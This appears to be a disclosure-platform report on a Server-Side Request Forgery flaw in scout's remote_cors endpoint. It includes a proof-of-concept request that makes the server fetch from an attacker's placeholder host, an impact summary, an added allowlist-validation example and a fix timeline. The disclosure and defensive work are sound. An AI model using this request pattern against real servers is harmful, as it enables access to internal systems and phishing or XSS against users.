Server-Side Request Forgery in scout in clinical-genomics/scout

Valid

Reported on

May 3rd 2022


Description

Server-Side Request Forgery in remote_cors

Proof of Concept

GET /remote/cors/http://<my-vps>:8888 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/cust000/cases
Cookie: <cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


PoC Image


Impact

An attacker could make the application perform arbitrary requests: serve a phishing page that steals cookies, reach private (internal) areas through the server, or return content that leads to XSS.
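As an added, defensive example (not scout's own code and not the merged fix), the allowlist check a URL-proxying view such as /remote/cors/<url> can apply before it fetches anything; the permitted host names, the function name and the Flask-style calling convention are assumptions.

```python
# Added example, not part of scout: validate the target of a URL-proxying
# endpoint before the server fetches it. A Flask-style view would call
# is_allowed_remote_url(url) and answer 403 unless it returns True.
from ipaddress import ip_address
from urllib.parse import urlsplit

# Hosts the proxy may fetch from (constructed sample values, not scout's).
ALLOWED_HOSTS = {"genome.ucsc.edu", "rest.ensembl.org"}
ALLOWED_SCHEMES = {"http", "https"}


def is_allowed_remote_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if url is an http(s) URL whose host is allowlisted.

    Refuses other schemes (file://, gopher://, ...), userinfo tricks such as
    http://allowed-host@other-host/, literal IP addresses (so loopback,
    link-local and RFC 1918 targets are never fetched) and any host that is
    not on the allowlist.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        # e.g. malformed IPv6 literal; treat as not allowed
        return False
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    # A "user@" prefix lets the real host hide behind an allowlisted name.
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname  # already lower-cased, brackets stripped
    if not host:
        return False
    # Literal IPs are rejected outright instead of being range-checked:
    # the allowlist holds names, so any address literal is out of policy.
    try:
        ip_address(host)
        return False
    except ValueError:
        pass
    return host in allowed_hosts
```

Resolving the allowlisted name to an address and re-checking it at connect time guards against DNS answers that point inside the network; that step is left out here because it needs network access.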

Timeline

We are processing your report and will contact the clinical-genomics/scout team within 24 hours. (21 days ago)
Nhien.IT modified the report (21 days ago)
We have contacted a member of the clinical-genomics/scout team and are waiting to hear back. (20 days ago)
Chiara Rasi validated this vulnerability. (19 days ago)
Nhien.IT has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Chiara Rasi confirmed that a fix has been merged on b0ef15. (19 days ago)
Chiara Rasi has been awarded the fix bounty.
Nhien.IT (Researcher), 19 days ago:

Hi @maintainer, the fix is already released, can you assign a CVE here? If you can, hope @admin help.

Jamie Slome (Admin), 19 days ago:

Sorted 👍
